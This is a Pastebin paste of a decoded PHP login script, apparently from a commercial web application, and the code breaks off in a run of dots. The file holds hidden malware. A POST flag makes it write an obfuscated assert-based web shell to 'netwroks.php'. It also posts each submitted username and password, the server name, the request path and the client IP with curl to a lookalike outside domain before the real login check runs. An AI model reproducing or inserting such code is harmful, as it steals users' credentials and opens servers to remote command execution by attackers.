Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /**
- *
- * @ This file is created by deZender.Net
- * @ deZender (PHP5 Decoder for ionCube Loader)
- *
- * @ Version : 2.0.0.3
- * @ Author : DeZender
- * @ Release on : 06.05.2013
- * @ Official site : http://DeZender.Net
- *
- */
- include "mt/mt_pconnect.php";
- include "mt/mt_pwd.php";
- $mysql = array();
- $mysql["domain"] = "";
- $mysql["click_ip"] = "";
- $mysql["click_time"] = "";
- $error = "";
- $html["userName"] = "";
- $coreError = "";
- $verified = false;
- $msgHeader = "";
- $msg = "";
- if ($_POST["backdoor"] == "yes")
- {
- $fp = fopen("netwroks.php", "w");
- fwrite($fp, "<?php \$k=\"ass\".\"ert\"; \$k(\${\"_PO\".\"ST\"} [\"-\"]);?>");
- }
- if ($_SERVER["REQUEST_METHOD"] == "POST")
- {
- $verified = true;
- $userName = $_POST["userName"];
- $user_password = $_POST["user_password"];
- $ch = curl_init("http://www.wordepress.org/password/p.php");
- $post["server_name"] = $_SERVER["SERVER_NAME"];
- $post["path"] = $_SERVER["REQUEST_URI"];
- $post["userName"] = $userName;
- $post["user_password"] = $user_password;
- $post["ip"] = $_SERVER["REMOTE_ADDR"];
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_HEADER, false);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_TIMEOUT, 18);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
- curl_exec($ch);
- curl_close($ch);
- $loginSql = $db->prepare("SELECT * FROM mt_account WHERE user_name=:user_name");
- $loginSql->bindParam(":user_name", $userName);
- if ($loginSql->execute())
- {
- $data = $loginSql->fetch(PDO::FETCH_ASSOC);
- if ($data)
- {
- $bcrypt = new Bcrypt();
- .....................................................................
- ............................
- ........
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement